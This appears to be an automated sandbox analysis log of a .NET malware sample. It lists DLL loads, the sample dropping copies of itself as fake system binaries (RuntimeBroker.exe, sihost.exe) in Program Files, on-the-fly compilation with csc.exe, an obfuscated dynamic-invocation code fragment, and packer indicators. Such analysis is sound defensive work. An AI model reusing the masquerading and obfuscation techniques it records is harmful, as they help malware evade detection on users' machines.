Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Section loaded: mscoree.dll
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Section loaded: apphelp.dll
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Section loaded: version.dll
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Section loaded: wldp.dll
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Section loaded: profapi.dll
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Section loaded: mscoree.dll
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Section loaded: version.dll
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Section loaded: wldp.dll
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Section loaded: profapi.dll
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: mscoree.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: version.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: wldp.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: profapi.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: mscoree.dll
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: version.dll
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: wldp.dll
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: profapi.dll
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: mscoree.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: version.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: wldp.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: profapi.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: sspicli.dll

Source: C:\Users\user\Desktop\fdsN8iw6WG.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Directory created: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Directory created: C:\Program Files\Windows Portable Devices\9e0136ccaf7772	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Directory created: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Directory created: C:\Program Files\Windows Sidebar\Shared Gadgets\9e8d7a4ca61bd9	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Directory created: C:\Program Files\Microsoft\sihost.exe	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Directory created: C:\Program Files\Microsoft\66fc9ff0ee96c2	Jump to behavior

Source: fdsN8iw6WG.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: fdsN8iw6WG.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: fdsN8iw6WG.exe

Static file information: File size 2033664 > 1048576

Source: fdsN8iw6WG.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1f0000

Source: fdsN8iw6WG.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: yXT9UKQtlxtUx0jY65A.pdbekNQTGLIDcuiPehd+XZZKKCwsBQHivX0eK9u+xtYxp3wyQQVngc4yE9B`1[[System.Object, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]][] source: fdsN8iw6WG.exe, RuntimeBroker.exe.0.dr, dEhCbXEAIUCUplvbdoWVtmGx.exe0.0.dr, dEhCbXEAIUCUplvbdoWVtmGx.exe.0.dr, sihost.exe.0.dr
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\khjlbg4u\khjlbg4u.pdb source: fdsN8iw6WG.exe, 00000000.00000002.2260614296.00000000037A7000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\diacazft\diacazft.pdb source: fdsN8iw6WG.exe, 00000000.00000002.2260614296.00000000037A7000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: fdsN8iw6WG.exe, pdbekNQTGLIDcuiPehd.cs

.Net Code: Type.GetTypeFromHandle(Qae5tnodZUfv3RITPXZ.WNl6Y5Yl7ZE(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(Qae5tnodZUfv3RITPXZ.WNl6Y5Yl7ZE(16777245)),Type.GetTypeFromHandle(Qae5tnodZUfv3RITPXZ.WNl6Y5Yl7ZE(16777259))})

Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\diacazft\diacazft.cmdline"
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\khjlbg4u\khjlbg4u.cmdline"
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\diacazft\diacazft.cmdline"	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\khjlbg4u\khjlbg4u.cmdline"	Jump to behavior

Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Code function: 0_2_00007FF848E909B0 push ebx; retf	0_2_00007FF848E90B1A
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Code function: 0_2_00007FF848E90AD3 push ebx; retf	0_2_00007FF848E90B1A
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Code function: 0_2_00007FF848E90AFB push ebx; retf	0_2_00007FF848E90B1A
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Code function: 0_2_00007FF849290E2C pushad ; ret	0_2_00007FF849290E2D
Source: C:\Program Files\Microsoft\sihost.exe	Code function: 8_2_00007FF848E609B0 push ebx; retf	8_2_00007FF848E60B1A
Source: C:\Program Files\Microsoft\sihost.exe	Code function: 8_2_00007FF848E60AD3 push ebx; retf	8_2_00007FF848E60B1A
Source: C:\Program Files\Microsoft\sihost.exe	Code function: 8_2_00007FF848E60AFB push ebx; retf	8_2_00007FF848E60B1A
Source: C:\Program Files\Microsoft\sihost.exe	Code function: 8_2_00007FF848E600BD pushad ; iretd	8_2_00007FF848E600C1
Source: C:\Program Files\Microsoft\sihost.exe	Code function: 9_2_00007FF848E809B0 push ebx; retf	9_2_00007FF848E80B1A
Source: C:\Program Files\Microsoft\sihost.exe	Code function: 9_2_00007FF848E80AD3 push ebx; retf	9_2_00007FF848E80B1A
Source: C:\Program Files\Microsoft\sihost.exe	Code function: 9_2_00007FF848E80AFA push ebx; retf	9_2_00007FF848E80B1A
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Code function: 16_2_00007FF848E909B0 push ebx; retf	16_2_00007FF848E90B1A
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Code function: 16_2_00007FF848E90AD3 push ebx; retf	16_2_00007FF848E90B1A
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Code function: 16_2_00007FF848E90AFB push ebx; retf	16_2_00007FF848E90B1A
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Code function: 16_2_00007FF848EA6983 push edx; iretd	16_2_00007FF848EA698B
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Code function: 16_2_00007FF848EA88C3 pushfd ; iretd	16_2_00007FF848EA88C6
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Code function: 16_2_00007FF848EC7AA5 pushad ; iretd	16_2_00007FF848EC7AED
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Code function: 16_2_00007FF848EC7A65 pushad ; iretd	16_2_00007FF848EC7AED
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Code function: 33_2_00007FF848E509B0 push ebx; retf	33_2_00007FF848E50B1A
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Code function: 33_2_00007FF848E50AD3 push ebx; retf	33_2_00007FF848E50B1A
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Code function: 33_2_00007FF848E50AFB push ebx; retf	33_2_00007FF848E50B1A
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Code function: 39_2_00007FF848E909B0 push ebx; retf	39_2_00007FF848E90B1A
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Code function: 39_2_00007FF848E90AD3 push ebx; retf	39_2_00007FF848E90B1A
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Code function: 39_2_00007FF848E90AFB push ebx; retf	39_2_00007FF848E90B1A
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Code function: 39_2_00007FF848EA6988 push edx; iretd	39_2_00007FF848EA698B
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Code function: 39_2_00007FF848EA88C3 pushfd ; iretd	39_2_00007FF848EA88C6
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Code function: 39_2_00007FF848EC7AA5 pushad ; iretd	39_2_00007FF848EC7AED
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Code function: 39_2_00007FF848EC7A65 pushad ; iretd	39_2_00007FF848EC7AED
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Code function: 44_2_00007FF848EB7AA5 pushad ; iretd	44_2_00007FF848EB7AED
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Code function: 44_2_00007FF848EB7A65 pushad ; iretd	44_2_00007FF848EB7AED
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Code function: 44_2_00007FF848EB7B45 pushad ; iretd	44_2_00007FF848EB7AED

Source: fdsN8iw6WG.exe	Static PE information: section name: .text entropy: 7.577310772845179
Source: dEhCbXEAIUCUplvbdoWVtmGx.exe.0.dr	Static PE information: section name: .text entropy: 7.577310772845179
Source: RuntimeBroker.exe.0.dr	Static PE information: section name: .text entropy: 7.577310772845179
